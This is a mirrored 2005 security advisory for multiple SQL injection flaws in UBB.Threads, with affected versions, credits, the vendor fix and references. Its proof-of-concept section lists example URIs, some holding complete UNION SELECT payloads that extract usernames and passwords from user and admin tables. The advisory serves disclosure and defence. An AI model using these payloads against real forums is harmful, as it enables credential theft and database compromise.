|
Feeds -
Exploits
|
|
Written by James Bercegay of the GulfTech Security Research Team
|
|
Monday, 16 March 2009 21:17 |
UBBCentral UBB.Threads Multiple SQL Injection Vulnerabilities
-\\Bugtraq ID:
14052
-\\Class:
Input Validation Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Jun 24 2005 12:00AM
-\\Updated:
Mar 16 2009 03:46PM
-\\Credit:
James Bercegay of the GulfTech Security Research Team is credited with the discovery of this vulnerability.
-\\Vulnerable:
UBBCentral UBB.threads 6.5.1 .1
UBBCentral UBB.threads 6.5.1
UBBCentral UBB.threads 6.5
UBBCentral UBB.threads 6.2.3
UBBCentral UBB.threads 6.0
UBBCentral UBB.threads 5.5.1
-\\Not Vulnerable:
UBBCentral UBB.threads 6.5.2 Beta2
-\\Discussion
UBB.Threads is prone to multiple SQL injection vulnerabilities because
the application fails to properly sanitize user-supplied input before
using it in SQL queries.
A successful exploit could allow an attacker to compromise the
application, access or modify data, or exploit vulnerabilities in the
underlying database.
-\\Exploit(s)/PoC(s):
No exploit is required.
The following example URIs are available:
http://www.example.com/ubbt/download.php?Number=42227[SQL]
http://www.example.com/ubbt/calendar.php?Cat=7&month=6&year=2005[SQL]
http://www.example.com/ubbt/calendar.php?Cat=&month=7[SQL]&year=2005
http://www.example.com/ubbt/modifypost.phpCat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post
http://www.example.com/ubbt/mailthread.php?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat
http://www.example.com/ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received
http://www.example.com/ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat
http://www.example.com/ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded
http://www.example.com/ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]
http://www.example.com/ubbthreads/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,email,password,0,0%20FROM%20admin_users%20WHERE%20id=1/*&status=N&box=received
-\\Solution
The vendor has addressed these issues in UBB.Threads 6.5.2beta2. Please see the references for more information.
UBBCentral UBB.threads 6.0
--UBBCentral UBB.Threads 6.5.2beta2
http://www.infopop.com/members/members.phhttp://www.infopop.com/members/members.php
UBBCentral UBB.threads 6.2.3
--UBBCentral UBB.Threads 6.5.2beta2
http://www.infopop.com/members/members.phhttp://www.infopop.com/members/members.php
UBBCentral UBB.threads 6.5
--UBBCentral UBB.Threads 6.5.2beta2
http://www.infopop.com/members/members.phhttp://www.infopop.com/members/members.php
UBBCentral UBB.threads 6.5.1
--UBBCentral UBB.Threads 6.5.2beta2
http://www.infopop.com/members/members.phhttp://www.infopop.com/members/members.php
UBBCentral UBB.threads 6.5.1 .1
--UBBCentral UBB.Threads 6.5.2beta2
http://www.infopop.com/members/members.phhttp://www.infopop.com/members/members.php
-\\Reference(s)
--Infopop UBB Threads Multiple Vulnerabilities
http://www.gulftech.org/?node=research&article_id=00084-0623200 (Gulftech Research)
--UBB.Threads 6.5.2b2 Released to the Member Area
http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post4235 (UBBCentral)
--UBB.threads homepage
http://www.ubbcentral.com (UBBCentral)
--Infopop UBB.Threads Admin Credentials via SQL Injection
http://www.securityfocus.com/archive/1/50178 (
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
)
|
